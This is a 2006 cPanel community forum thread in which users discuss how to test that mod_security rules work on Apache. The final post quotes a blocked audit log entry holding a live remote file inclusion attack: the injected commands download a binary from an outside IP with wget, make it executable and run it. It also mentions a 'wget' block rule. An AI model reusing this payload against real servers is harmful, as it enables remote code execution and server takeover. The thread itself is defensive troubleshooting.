The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

testing mod_security

Discussion in 'Security' started by embsupafly, Mar 9, 2006.

  1. embsupafly

    embsupafly Active Member

    Joined:
    Dec 24, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    I installed the mod_security module for apache and added a few example rulesets shared on this forum. Apache started ok when I was done and I did a config test and everything was ok. I tailed /use/local/apache/logs/audit_log and nothing is showing up, there is actually nothing in the file. Does this mean there are no attacks yet? How can I simulate an attack to ensure that this is working ok?
     
  2. webignition

    webignition Well-Known Member

    Joined:
    Jan 22, 2005
    Messages:
    1,880
    Likes Received:
    0
    Trophy Points:
    36
    The only way to be 100% sure that your rulesets are doing what they should is by checking each rule individually and trying to do something so that the rule is invoked - what this is depends entirely on the rule.

    However if you want to test things in general, try finding a rule that relates to something in appropriate in a GET request - i.e. something bad in the URL.

    For example of you have a rule that blocks requests with 'wget' in the URL, try visiting http://www.example.com/?wget and you should notice mod_sec blocking the request.

    If I remember correctly, the audit log is not updated in real time (I might be wrong), so don't expect anything in there immediately.
     
  3. sawbuck

    sawbuck Well-Known Member

    Joined:
    Jan 18, 2004
    Messages:
    1,367
    Likes Received:
    5
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
  4. embsupafly

    embsupafly Active Member

    Joined:
    Dec 24, 2003
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    What were the attackers trying to do here?

    Code:
    Request: ***.***.com 82.185.246.179 - - [09/Mar/2006:04:33:41 -0500] "GET /index2.php?option=com_conten
    t&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://204.83.56.14
    4/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;echo%20YYY;echo|  HTTP/1.1" 403 426 "-" "Mo
    zilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" - "-"
    ----------------------------------------
    GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_
    absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicupo;echo%20YYY
    ;echo|  HTTP/1.1
    Host: **.**.***.***
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
    mod_security-message: Access denied with code 403. Pattern match "wget " at THE_REQUEST
    mod_security-action: 403
    
    HTTP/1.1 403 Forbidden
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1
    --65e08270--
    
     
Loading...

Share This Page